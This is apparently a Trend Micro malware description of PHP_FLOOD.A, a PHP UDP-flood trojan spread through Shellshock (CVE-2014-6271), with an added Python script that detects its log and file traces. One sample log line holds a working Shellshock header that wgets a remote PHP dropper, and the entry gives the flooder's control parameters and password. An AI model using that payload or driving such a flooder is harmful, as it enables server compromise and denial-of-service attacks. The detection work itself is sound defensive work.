PHP_FLOOD.A
Aliases: Troj/PHPFlood-A (Sophos)
Platform: Linux, Unix
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
TECHNICAL DETAILS
Arrival Details
This Trojan may be downloaded from the following remote sites:
- http://{BLOCKED}.{BLOCKED}.225.119/conf.txt
This malware arrives by exploiting the following vulnerability:
- CVE-2014-6271 (GNU Bash "Shellshock"): a crafted environment variable, typically delivered in an HTTP header to a CGI script, causes Bash to execute commands that download and run the script
NOTES:
It accepts the following parameters through HTTP GET:
- host
- port
- timeout
- password
It uses these parameters to perform UDP flooding against the specified host; the flood data consists of 65,000 random alphanumeric characters.
If no port is passed, it randomly picks a port between 79 and 65,000.
It checks that the supplied password is microstresser14 before proceeding.
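The following Python script is an added example and is not part of Trend Micro's description or of the malware itself. It scans web server access log lines for the two observable stages described above, a Shellshock exploit attempt in a request header and a control request carrying the host, port, timeout and password GET parameters, and checks a PHP file on disk for the hard-coded password. The log format (Apache/nginx "combined"), the sample log lines, the IP addresses and paths, and the shape of the $_GET reads in the sample PHP fragment are constructed assumptions; only the parameter names, the password string and CVE-2014-6271 come from the page.

```python
"""Detection helper for PHP_FLOOD.A activity in access logs and on disk.

Added example, not Trend Micro's code.  All sample data is constructed;
192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" log format (assumed; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# CVE-2014-6271 trigger: a Bash function definition "() {" placed in an
# attacker-controlled header that the CGI layer exports as an env variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# GET parameters and password named in the description above.
FLOOD_PARAMS = {"host", "port", "timeout", "password"}
FLOOD_PASSWORD = "microstresser14"

# PHP reads of request parameters, e.g. $_GET['host'] (assumed source shape).
PHP_GET_RE = re.compile(r"""\$_(?:GET|REQUEST)\s*\[\s*['"](\w+)['"]\s*\]""")


def parse_line(line):
    """Split one combined-format log line into fields, or None if malformed."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def shellshock_hit(entry):
    """True if the UA, Referer or decoded request target carries '() {'."""
    fields = (entry["ua"], entry["referer"], unquote(entry["target"]))
    return any(SHELLSHOCK_RE.search(f) for f in fields)


def flood_control_hit(entry):
    """'confirmed' if all four parameters and the known password are present,
    'suspect' if the parameter set is present with another password, else None."""
    params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    if not FLOOD_PARAMS <= set(params):
        return None
    return "confirmed" if params["password"] == [FLOOD_PASSWORD] else "suspect"


def scan(lines):
    """Return (source_ip, finding, detail) tuples for suspicious log lines."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if shellshock_hit(entry):
            findings.append((entry["ip"], "shellshock-delivery", entry["target"]))
        level = flood_control_hit(entry)
        if level:
            params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
            # An empty port means the script picks one at random (79-65000).
            victim = f'{params["host"][0]}:{params["port"][0] or "random"}'
            findings.append((entry["ip"], f"flood-control-{level}", victim))
    return findings


def source_indicators(php_source):
    """Indicators for a dropped copy on disk: the hard-coded password literal
    and reads of all four GET parameter names.  Returns the matched labels."""
    hits = set()
    if FLOOD_PASSWORD in php_source:
        hits.add("password-literal")
    if FLOOD_PARAMS <= set(PHP_GET_RE.findall(php_source)):
        hits.add("get-parameters")
    return hits


# Constructed sample log lines.
SAMPLE_LOG = [
    # 1. Shellshock attempt in the User-Agent fetching the dropper.
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status.sh HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \\"wget http://192.0.2.10/conf.txt -O /tmp/x.php\\""',
    # 2. Operator driving the flooder; no port given, so a random one is used.
    '198.51.100.9 - - [25/Sep/2014:10:05:33 +0000] '
    '"GET /tmp/x.php?host=192.0.2.44&port=&timeout=300&password=microstresser14 HTTP/1.1" '
    '200 0 "-" "Mozilla/5.0"',
    # 3. Same parameter set with a wrong password.
    '198.51.100.9 - - [25/Sep/2014:10:05:40 +0000] '
    '"GET /tmp/x.php?host=192.0.2.44&port=53&timeout=60&password=guess HTTP/1.1" '
    '200 0 "-" "Mozilla/5.0"',
    # 4. Benign request.
    '192.0.2.2 - - [25/Sep/2014:10:06:00 +0000] "GET /index.php?page=home HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

# Constructed PHP fragment with the parameter reads and password check.
SAMPLE_PHP = """<?php
$host = $_GET['host']; $port = $_GET['port'];
$timeout = $_GET['timeout']; $password = $_GET['password'];
if ($password != "microstresser14") { exit(); }
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
    print(sorted(source_indicators(SAMPLE_PHP)))
```

The Shellshock check is applied to the User-Agent, Referer and decoded request target because any of these may be exported to the environment of a CGI script; extend the field list if your server logs further headers. A control request with the full parameter set but a different password is still reported as suspect, since it shows the attacker's tooling probing the host.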
SOLUTION
Scan your computer with your Trend Micro product to delete files detected as PHP_FLOOD.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information. Because this Trojan arrives through CVE-2014-6271, also update GNU Bash on affected hosts so the vulnerability cannot be exploited again to re-download the script.